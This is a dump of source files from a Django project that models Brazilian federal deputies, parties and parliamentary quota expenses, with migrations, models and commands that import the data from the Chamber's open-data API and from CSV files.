"num_lines": 61, "path": "/politicos/migrations/0005_auto_20180508_1559.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-08 15:59\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('empresas', '0005_empresa_uf'),\n ('politicos', '0004_auto_20180504_1903'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='GastoCotaParlamentar',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('legislatura', models.IntegerField(null=True)),\n ('data_emissao', models.DateTimeField(null=True)),\n ('id_documento', models.IntegerField(null=True)),\n ('tipo_documento', models.IntegerField(choices=[(0, 'Nota Fiscal'), (1, 'Recibo'), (2, 'Despesa no Exterior')], null=True)),\n ('ano', models.IntegerField(null=True)),\n ('especificacao_subcota', models.IntegerField(null=True)),\n ('lote', models.IntegerField(null=True)),\n ('mes', models.IntegerField(null=True)),\n ('parcela', models.IntegerField(null=True)),\n ('ressarcimento', models.IntegerField(null=True)),\n ('subcota', models.IntegerField(null=True)),\n ('cpf', models.CharField(max_length=14, null=True)),\n ('descricao', models.CharField(max_length=127, null=True)),\n ('descricao_especificacao', models.CharField(max_length=31, null=True)),\n ('fornecedor', models.CharField(max_length=255, null=True)),\n ('numero_documento', models.CharField(max_length=63, null=True)),\n ('nome_passageiro', models.CharField(max_length=63, null=True)),\n ('trecho_viagem', models.CharField(max_length=127, null=True)),\n ('valor_documento', models.DecimalField(decimal_places=2, max_digits=8, null=True)),\n ('valor_glosa', models.DecimalField(decimal_places=2, max_digits=8, null=True)),\n ('valor_liquido', models.DecimalField(decimal_places=2, max_digits=8, null=True)),\n ('valor_restituicao', models.DecimalField(decimal_places=2, max_digits=8, null=True)),\n ],\n options={\n 'ordering': ['-data_emissao'],\n },\n ),\n migrations.AddField(\n model_name='deputado',\n name='carteira_parlamentar',\n field=models.IntegerField(null=True),\n ),\n migrations.AddField(\n model_name='gastocotaparlamentar',\n name='deputado',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='gastos', to='politicos.Deputado'),\n ),\n migrations.AddField(\n model_name='gastocotaparlamentar',\n name='empresa',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='gastos_deputados', to='empresas.Empresa'),\n ),\n ]\n" }, { "alpha_fraction": 0.7634408473968506, "alphanum_fraction": 0.7634408473968506, "avg_line_length": 17.600000381469727, "blob_id": "dc3641bf68c387968c1b0aa934e43804a0e12e62", "content_id": "2d139da92696a1aa53a275e74067ac895a26d55b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/politicos/apps.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass PoliticosConfig(AppConfig):\n name = 'politicos'\n" }, { "alpha_fraction": 0.8723404407501221, "alphanum_fraction": 0.8723404407501221, "avg_line_length": 22.5, "blob_id": "dc7fcdcb919f86dac861a0b65b586a21b899b04c", "content_id": "f63bee12c13675799380b49c2548b37112ae3573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 94, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/.env.example", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "POSTGRES_DB=brasilio\nPOSTGRES_USER=brasilio\nPOSTGRES_PASSWORD=brasilio\nPOSTGRES_HOST=database\n" }, { "alpha_fraction": 0.525390625, "alphanum_fraction": 0.56640625, "avg_line_length": 22.272727966308594, "blob_id": "0f87187d4b78e9b744e8f513e4c96dfd398508f5", "content_id": "d5dcd41ab6b7896668073d8ecfebaee987d6fa20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 512, "license_type": "no_license", "max_line_length": 85, "num_lines": 22, "path": "/politicos/migrations/0002_auto_20180504_1821.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 18:21\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('politicos', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='partido',\n name='id',\n ),\n migrations.AlterField(\n model_name='partido',\n name='sigla',\n field=models.CharField(max_length=15, primary_key=True, serialize=False),\n ),\n ]\n" }, { "alpha_fraction": 0.6049586534500122, "alphanum_fraction": 0.6115702390670776, "avg_line_length": 26.5, "blob_id": "fb00c0f23782bad5032151d021137771f411fb9a", "content_id": "b9dfeb777ead76f1fbf32159dada5a58809da7ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 605, "license_type": "no_license", "max_line_length": 97, "num_lines": 22, "path": "/politicos/management/commands/import_partidos.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import requests\nfrom django.core.management import BaseCommand\n\nfrom politicos.models import Partido\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n partidos = []\n\n camara_url = 'https://dadosabertos.camara.leg.br/api/v2/partidos/?formato=json&itens=100'\n\n resposta = requests.get(camara_url).json()\n\n for partido in resposta['dados']:\n partidos.append(Partido(\n id_camara=partido['id'],\n nome=partido['nome'],\n sigla=partido['sigla'],\n ))\n\n Partido.objects.bulk_create(partidos)\n" }, { "alpha_fraction": 0.6226053833961487, "alphanum_fraction": 0.6347962617874146, "avg_line_length": 36.045162200927734, "blob_id": "56baa713d838c2dba7b4b0ed6ff6b1259e099a47", "content_id": "c3a8f98a0302777b4eb7547686799a4a63c4731c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5742, "license_type": "no_license", "max_line_length": 95, "num_lines": 155, "path": "/politicos/models.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.db.models import Avg, F, FilteredRelation, Prefetch, Q, Sum\n\n\nclass DeputadoQuerySet(models.QuerySet):\n\n def annotate_gasto_mensal_por_deputado(self):\n meses = range(1, 13)\n anos = range(2009, 2019)\n annotations = {\n f'gastos_{ano}_{mes:02}': Sum(\n 'gastos__valor_liquido',\n filter=Q(gastos__mes=mes, gastos__ano=ano)\n )\n for ano in anos for mes in meses\n }\n return self.annotate(**annotations)\n\n def annotate_gasto_no_mes_por_deputado(self, mes, ano):\n annotation = {\n f'gastos_{ano}_{mes:02}': Sum(\n 'gastos__valor_liquido',\n filter=Q(gastos__mes=mes, gastos__ano=ano)\n )\n }\n return self.annotate(**annotation)\n\n def annotate_gasto_no_mes_por_deputado2(self, mes, ano):\n return self.annotate(\n gastos_filtrados=FilteredRelation(\n 'gastos',\n condition=Q(gastos__mes=mes, gastos__ano=ano)\n )\n ).annotate(\n **{f'gastos_{ano}_{mes:02}': Sum('gastos_filtrados__valor_liquido')}\n )\n\n def get_media_mensal(self):\n meses = range(1, 13)\n anos = range(2009, 2019)\n aggregations = {\n f'media_{ano}_{mes:02}': Avg(f'gastos_{ano}_{mes:02}')\n for ano in anos for mes in meses\n }\n return self.annotate_gasto_mensal_por_deputado().aggregate(**aggregations)\n\n def prefetch_gastos(self, **kwargs):\n gastos_queryset = GastoCotaParlamentar.objects.select_related(\n 'empresa'\n ).filter(**kwargs)\n prefetch = Prefetch('gastos', queryset=gastos_queryset)\n return self.prefetch_related(prefetch)\n\n def annotate_gastos_acima_dobro(self, descricao_gasto):\n media = GastoCotaParlamentar.objects.filter_descricao(descricao_gasto).media()\n acima_dobro = Q(gastos__descricao=descricao_gasto, gastos__valor_liquido__gt=media * 2)\n count_acima_dobro = Count('pk', filter=acima_dobro)\n count_geral = Count('pk', filter=Q(gastos__descricao=descricao_gasto))\n return self.annotate(gastos_acima_dobro=count_acima_dobro, qtd_gastos=count_geral)\n\n\nclass GastoCotaParlamentarQuerySet(models.QuerySet):\n\n def filter_descricao(self, descricao):\n return self.filter(descricao=descricao)\n\n def media(self):\n return self.aggregate(media=Avg('valor_liquido'))['media']\n\n\n\nclass Partido(models.Model):\n sigla = models.CharField(max_length=15, primary_key=True)\n nome = models.CharField(max_length=255)\n id_camara = models.IntegerField()\n\n def __str__(self):\n return self.sigla\n\n\nclass Deputado(models.Model):\n nome = models.CharField(max_length=255)\n partido = models.ForeignKey(Partido, on_delete=models.PROTECT)\n uf = models.ForeignKey('comum.Estado', on_delete=models.PROTECT)\n id_legislatura = models.IntegerField()\n carteira_parlamentar = models.IntegerField(null=True)\n\n objects = DeputadoQuerySet.as_manager()\n\n def __str__(self):\n return f'{self.nome} - {self.partido_id}'\n\n\nclass GastoCotaParlamentar(models.Model):\n TIPOS_DOCUMENTO = (\n (0, 'Nota Fiscal'),\n (1, 'Recibo'),\n (2, 'Despesa no Exterior'),\n )\n legislatura = models.IntegerField(null=True)\n data_emissao = models.DateTimeField(null=True)\n id_documento = models.IntegerField(null=True)\n tipo_documento = models.IntegerField(choices=TIPOS_DOCUMENTO, null=True)\n ano = models.IntegerField(null=True)\n especificacao_subcota = models.IntegerField(null=True)\n lote = models.IntegerField(null=True)\n mes = models.IntegerField(null=True)\n parcela = models.IntegerField(null=True)\n ressarcimento = models.IntegerField(null=True)\n subcota = models.IntegerField(null=True)\n cpf = models.CharField(max_length=14, null=True)\n descricao = models.CharField(max_length=127, null=True)\n descricao_especificacao = models.CharField(max_length=31, null=True)\n fornecedor = models.CharField(max_length=255, null=True)\n numero_documento = models.CharField(max_length=63, null=True)\n nome_passageiro = models.CharField(max_length=63, null=True)\n trecho_viagem = models.CharField(max_length=127, null=True)\n valor_documento = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n valor_glosa = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n valor_liquido = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n valor_restituicao = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n deputado = models.ForeignKey(\n Deputado,\n related_name='gastos',\n db_index=True,\n on_delete=models.PROTECT,\n )\n empresa = models.ForeignKey(\n 'empresas.Empresa',\n related_name='gastos_deputados',\n db_index=True,\n on_delete=models.PROTECT,\n null=True,\n )\n\n objects = GastoCotaParlamentarQuerySet.as_manager()\n\n def __str__(self):\n return f'{self.valor_documento} {self.mes}/{self.ano}'\n\n class Meta:\n indexes = [\n models.Index(fields=['-data_emissao']),\n models.Index(fields=['data_emissao']),\n models.Index(fields=['mes']),\n models.Index(fields=['ano']),\n models.Index(fields=['descricao']),\n models.Index(fields=['descricao_especificacao']),\n models.Index(fields=['fornecedor']),\n models.Index(fields=['valor_liquido']),\n models.Index(fields=['valor_documento']),\n models.Index(fields=['deputado']),\n models.Index(fields=['empresa']),\n ]\n ordering = ['-data_emissao']\n" }, { "alpha_fraction": 0.7411764860153198, "alphanum_fraction": 0.7411764860153198, "avg_line_length": 16, "blob_id": "e3fd296e9ded09c1b6b26b38c59b58d82bc01a82", "content_id": "8401e5ee8306fca2b1f6f63e9ff1ef38534939c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/comum/apps.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass ComumConfig(AppConfig):\n name = 'comum'\n" }, { "alpha_fraction": 0.5093833804130554, "alphanum_fraction": 0.5361930131912231, "avg_line_length": 23.064516067504883, "blob_id": "6094d175aeb96a7082f8455b27ff217db204ffa6", "content_id": "b1a196bfe4724f1b031e8b069e964f8352028f23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 746, "license_type": "no_license", "max_line_length": 49, "num_lines": 31, "path": "/politicos/migrations/0004_auto_20180504_1903.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 19:03\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('politicos', '0003_deputado'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='partido',\n name='deferimento',\n ),\n migrations.RemoveField(\n model_name='partido',\n name='legenda',\n ),\n migrations.RemoveField(\n model_name='partido',\n name='presidente_nacional',\n ),\n migrations.AddField(\n model_name='partido',\n name='id_camara',\n field=models.IntegerField(default=1),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5275055170059204, "alphanum_fraction": 0.5305060744285583, "avg_line_length": 42.842105865478516, "blob_id": "841fc5846c0d12e068f0c4a0bf04ade6949664e1", "content_id": "abaffb61414362f2ec16f8e5e4a8ae0390992fb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5003, "license_type": "no_license", "max_line_length": 115, "num_lines": 114, "path": "/politicos/management/commands/import_gastos.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from dateutil.parser import parse\nfrom datetime import datetime\nimport pandas as pd\nfrom django.core.management import BaseCommand\n\nfrom empresas.models import Empresa\nfrom politicos.models import GastoCotaParlamentar, Deputado\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('inicio', type=int)\n\n def parse_data(self, data):\n try:\n return parse(data)\n except Exception:\n return None\n\n def handle(self, *args, **options):\n log = open('GASTOS_LOG.txt', 'a')\n\n cnpjs_salvos = list(Empresa.objects.values_list('cnpj', flat=True))\n deputados_salvos = list(Deputado.objects.values_list('id', flat=True))\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV\\n')\n csv = pd.read_csv(\n options['csv'],\n chunksize=100000,\n converters={\n 'txtCNPJCPF': str,\n }\n )\n\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Importando dados do grupo {contador}\\n')\n grupo = grupo[grupo['codLegislatura'] == 55]\n\n log.write(f'{datetime.now().isoformat()} Criando empresas não registradas do grupo {contador}\\n')\n empresas_invalidas = grupo[\n (grupo['txtCNPJCPF'].str.len() == 14) &\n (~grupo['txtCNPJCPF'].isin(cnpjs_salvos))\n ]\n empresas_invalidas = empresas_invalidas.drop_duplicates(['txtCNPJCPF'], keep='first')\n empresas = []\n for empresa in empresas_invalidas.itertuples():\n empresas.append(Empresa(\n cnpj=empresa.txtCNPJCPF,\n nome=empresa.txtFornecedor,\n uf_id=empresa.sgUF\n ))\n cnpjs_salvos.append(empresa.txtCNPJCPF)\n\n Empresa.objects.bulk_create(empresas)\n\n\n log.write(f'{datetime.now().isoformat()} Criando deputados não registradas do grupo {contador}\\n')\n deputados = grupo[\n (~grupo['idecadastro'].isin(deputados_salvos))\n ]\n deputados = deputados.drop_duplicates(['idecadastro'], keep='first')\n deputados_novos = []\n for dados in deputados.itertuples():\n deputados_novos.append(Deputado(\n id=dados.idecadastro,\n nome=dados.txNomeParlamentar,\n partido_id=dados.sgPartido,\n id_legislatura=dados.codLegislatura,\n carteira_parlamentar=dados.nuCarteiraParlamentar,\n uf_id=dados.sgUF,\n ))\n deputados_salvos.append(dados.idecadastro)\n\n Deputado.objects.bulk_create(deputados_novos)\n\n log.write(f'{datetime.now().isoformat()} Importando gastos do grupo {contador}\\n')\n gastos = []\n for dados in grupo.itertuples():\n cnpj = dados.txtCNPJCPF if len(dados.txtCNPJCPF) == 14 else None\n cpf = dados.txtCNPJCPF if len(dados.txtCNPJCPF) == 11 else None\n data = self.parse_data(dados.datEmissao)\n gastos.append(GastoCotaParlamentar(\n deputado_id=dados.idecadastro,\n empresa_id=cnpj,\n cpf=cpf,\n legislatura=dados.codLegislatura,\n data_emissao=data,\n id_documento=dados.ideDocumento,\n tipo_documento=dados.indTipoDocumento,\n ano=dados.numAno,\n mes=dados.numMes,\n subcota=dados.numSubCota,\n especificacao_subcota=dados.numEspecificacaoSubCota,\n lote=dados.numLote,\n parcela=dados.numParcela,\n descricao=dados.txtDescricao,\n descricao_especificacao=dados.txtDescricaoEspecificacao,\n fornecedor=dados.txtFornecedor,\n numero_documento=dados.txtNumero,\n nome_passageiro=dados.txtPassageiro,\n trecho_viagem=dados.txtTrecho,\n valor_documento=dados.vlrDocumento,\n valor_glosa=dados.vlrGlosa,\n valor_liquido=dados.vlrLiquido,\n valor_restituicao=dados.vlrRestituicao,\n ))\n\n log.write(f'{datetime.now().isoformat()} Criando gastos do grupo {contador}\\n')\n GastoCotaParlamentar.objects.bulk_create(gastos)\n\n log.write(f'{datetime.now().isoformat()} Importação finalizada\\n')\n\n" }, { "alpha_fraction": 0.4882459342479706, "alphanum_fraction": 0.5443037748336792, "avg_line_length": 21.1200008392334, "blob_id": "eec3cf727b8730fc32f20da78a27e4eed642a892", "content_id": "edd7f8cf9b4843233a9669a37a69d69bad96a014", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 48, "num_lines": 25, "path": "/empresas/migrations/0007_auto_20180517_1932.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-17 19:32\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('empresas', '0006_auto_20180513_0541'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='empresa',\n name='empresas',\n ),\n migrations.RemoveField(\n model_name='estrangeiro',\n name='empresas',\n ),\n migrations.RemoveField(\n model_name='pessoafisica',\n name='empresas',\n ),\n ]\n" }, { "alpha_fraction": 0.6210721135139465, "alphanum_fraction": 0.6561922430992126, "avg_line_length": 27.473684310913086, "blob_id": "8ee0efe3832183cab21a810c38adb12bdb08d587", "content_id": "3898f1637cf0a318087f46693343ee21a7ea86d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 541, "license_type": "no_license", "max_line_length": 148, "num_lines": 19, "path": "/politicos/migrations/0007_auto_20180513_0241.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-13 02:41\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('politicos', '0006_remove_deputado_id_camara'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='gastocotaparlamentar',\n name='empresa',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='gastos_deputados', to='empresas.Empresa'),\n ),\n ]\n" }, { "alpha_fraction": 0.5660971403121948, "alphanum_fraction": 0.6020683646202087, "avg_line_length": 38.01754379272461, "blob_id": "2943fdbf3e7af41353c276bb1eb805066f3620d5", "content_id": "b6e1b8ef469bde470c7a6ace694d2fbb722ff64d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2224, "license_type": "no_license", "max_line_length": 106, "num_lines": 57, "path": "/politicos/migrations/0008_auto_20180516_1511.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-16 15:11\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('politicos', '0007_auto_20180513_0241'),\n ]\n\n operations = [\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['-data_emissao'], name='politicos_g_data_em_147448_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['data_emissao'], name='politicos_g_data_em_706148_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['mes'], name='politicos_g_mes_2ed906_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['ano'], name='politicos_g_ano_2863bc_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['descricao'], name='politicos_g_descric_179e32_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['descricao_especificacao'], name='politicos_g_descric_747dd9_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['fornecedor'], name='politicos_g_fornece_d50161_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['valor_liquido'], name='politicos_g_valor_l_54a491_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['valor_documento'], name='politicos_g_valor_d_77e5c1_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['deputado'], name='politicos_g_deputad_193b26_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['empresa'], name='politicos_g_empresa_edaff8_idx'),\n ),\n ]\n" } ]
31
SureshN-Git/Hybrid_Address_Value_Predictor
https://github.com/SureshN-Git/Hybrid_Address_Value_Predictor
429eb0e2d39c0184f19f47723a2cc38ed04b68b3
b54cc6cf61ed4da995adbec93174f7f82ed1d709
c1aace1b96e487edb1b8e8fe353bd82b5a534f44
refs/heads/master
2022-02-25T15:06:11.920853
2019-10-25T03:28:45
2019-10-25T06:35:40
216,934,406
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48515331745147705, "alphanum_fraction": 0.5516858696937561, "avg_line_length": 18.9639892578125, "blob_id": "02bc18313b901cb9acdf81c4880ab5b3e863e3e6", "content_id": "c5b988144bb9dff30051bcca229be955a01d3e32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 14414, "license_type": "no_license", "max_line_length": 119, "num_lines": 722, "path": "/721sim-partial/uarchsim/predictor.cc", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <math.h>\n#include <cmath>\n#include <assert.h>\n#include <iostream>\n#include <stdlib.h>\n#include \"predictor.h\"\n\nusing namespace std;\n\npredictor::predictor(uint64_t AL_size, uint64_t type, uint64_t ORD)\n{\n\tuint64_t count = pow(2,15);\n\tuint64_t count1 = pow(2,25);\n\tpredict = new pred[count];\n\thystride = new hyb_pred[count];\n\tvpt = new VPT[count1];\n\tchooser = new uint64_t[count];\n\tfor (uint64_t i = 0; i < count; i++)\n\t{\n\t\tpredict[i].last_val = 0;\n\t\tpredict[i].last_val2 = 0;\n\t\tpredict[i].last_val3 = 0;\n\t\tpredict[i].last_val4 = 0;\n\t\tpredict[i].del = 0;\n\t\tpredict[i].conf = 0;\n\t\tpredict[i].iter_count = 0;\n\t\tchooser[i] = 1;\n\t}\n\n\tfor (uint64_t i = 0; i < count1; i++)\n\t{\n\t\tvpt[i].value = 0;\n\t\tvpt[i].conf = 0;\n\t}\n\tal_size = AL_size;\n\tupdate_queue = new uint64_t[al_size];\n\torder = ORD;\n\tuq_tail = 0;\n\tuq_head = 0;\n}\n\nuint64_t predictor::stride(uint64_t tag)\n{\n\n\tuint64_t value;\n\tpredict[tag].iter_count++;\n\tvalue = predict[tag].last_val + (predict[tag].del * predict[tag].iter_count);\n\treturn value;\n}\n\nuint64_t predictor::last_value(uint64_t tag)\n{\n\treturn predict[tag].last_val;\n}\n\nuint64_t predictor::get_val(uint64_t type, uint64_t PC)\n{\n\tuint64_t value;\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\n\tif (type == 1)\n\t{\n\t\tcounter = 1;\n\t\tvalue = stride(tag);\n\t}\n\telse if (type == 2)\n\t{\n\t\tvalue = last_value(tag);\n\t\tcounter = 2;\n\t}\n\n\treturn value;\n}\n\nuint64_t predictor::get_context_val(uint64_t LV1, uint64_t LV2,uint64_t LV3, uint64_t LV4, uint64_t found, uint64_t PC)\n{\n\tuint64_t value, tag;\n\tuint64_t tag1;\n\ttag1 = PC >> 2;\n\ttag1 = tag1 & 32767;\n\n\tcounter = 3;\n\tif (order == 4) {\n\t\tif(found >= 4)\n\t\t{\n\t\t\ttag = hash(PC,LV4, LV3, LV2, LV1);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 3)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val4,LV3,LV2, LV1);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 2)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val3, predict[tag1].last_val4,LV2,LV1);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 1)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val2, predict[tag1].last_val3,predict[tag1].last_val4,LV1);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 0)\n\t\t{\n\t\t\ttag = hash(PC,predict[tag1].last_val, predict[tag1].last_val2, predict[tag1].last_val3, predict[tag1].last_val4);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t}\n\telse if (order == 3) {\n\t\tif (found == 3) {\n\t\t\ttag = hash(PC, LV3, LV2, LV1, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 2) {\n\t\t\ttag = hash(PC, predict[tag1].last_val3, LV2, LV1, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 1) {\n\t\t\ttag = hash(PC, predict[tag1].last_val2, predict[tag1].last_val3, LV1, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, predict[tag1].last_val2, predict[tag1].last_val, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t}\n\telse if (order == 2) {\n\t\tif (found == 2) {\n\t\t\ttag = hash(PC, LV2, LV1, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 1) {\n\t\t\ttag = hash(PC, predict[tag1].last_val2, LV1, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, predict[tag1].last_val2, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t}\n\telse if (order == 1) {\n\t\tif (found == 1) {\n\t\t\ttag = hash(PC, LV1, 0, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, 0, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t}\n\treturn value;\n}\n\nuint64_t predictor::get_hybrid_val(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC)\n{\n\tuint64_t value_con, value_str, tag;\n\tuint64_t tag1;\n\ttag1 = PC >> 2;\n\thybrid = 1;\n\ttag1 = tag1 & 32767;\n\tbool choose;\n\tif (chooser[tag]>=2){\n\t\tchoose = 1;\n\t}\n\telse{\n\t\tchoose = 0;\n\t}\n\tvalue_con = get_context_val(LV1, LV2, LV3, LV4, found, PC);\n\n\tvalue_str = hystride[tag].last_val + (hystride[tag].del * found);\n\tif (choose) {\n\t\treturn value_con;\n\t}\n\telse{\n\t\treturn value_str;\n\t}\n\n}\n\n\n// uint64_t predictor::hash(uint64_t PC, uint64_t value1, uint64_t value2, uint64_t value3, uint64_t value4)\n// {\n// \tuint64_t tag,tag1,x1,x2,x3;\n// \tif (order == 4) {\n// \t\tPC = PC >>2;\n// \t\tvalue3 = value3 ^ PC;\n// \t\t//value3 = value3 << 8;\n// \t\tvalue2 = value2 ^ PC;\n// \t\t//value2 = value2 << 16;\n// \t\tvalue1 = value1 ^ PC;\n// \t\t//value1 = value1 << 24;\n// \t\tvalue4 = value4 ^ PC;\n//\n// \t\ttag = value1+value2+value3+value4;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 3) {\n// \t\tvalue1 = value1 ^ PC;\n// \t\tvalue2 = value2 ^ PC;\n// \t\tvalue3 = value3 ^ PC;\n// \t\t// value1 = value1 << 20;\n// \t\t// value2 = value2 << 10;\n// \t\t// tag = value1+value2+value3+value4;\n// \t\tPC = PC >>2;\n// \t\ttag = value1+value2+value3;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 2) {\n// \t\t// PC = PC << 20;\n// \t\t// value1 = value1 & 1023;\n// \t\t// value2 = value2 & 1023;\n// \t\t// value1 = value1 << 10;\n// \t\tPC = PC >> 2;\n// \t\ttag = PC^value1^value2;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 1){\n// \t\t// value1 = value1 & 32767;\n// \t\t// PC = PC & 32767;\n// \t\t// PC = PC << 15;\n// \t\tPC = PC >>2;\n// \t\ttag = PC^value1;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \tenqueue(tag);\n// \tHASH = tag;\n// \treturn tag;\n// }\n\n// uint64_t predictor::hash(uint64_t PC, uint64_t value1, uint64_t value2, uint64_t value3, uint64_t value4)\n// {\n// \tuint64_t tag,tag1,x1,x2,x3;\n// \tif (order == 4) {\n// \t\tvalue3 = value3 ^ PC;\n// \t\tvalue3 = value3 << 8;\n// \t\tvalue2 = value2 ^ PC;\n// \t\tvalue2 = value2 << 16;\n// \t\tvalue1 = value1 ^ PC;\n// \t\tvalue1 = value1 << 24;\n// \t\tvalue4 = value4 ^ PC;\n// 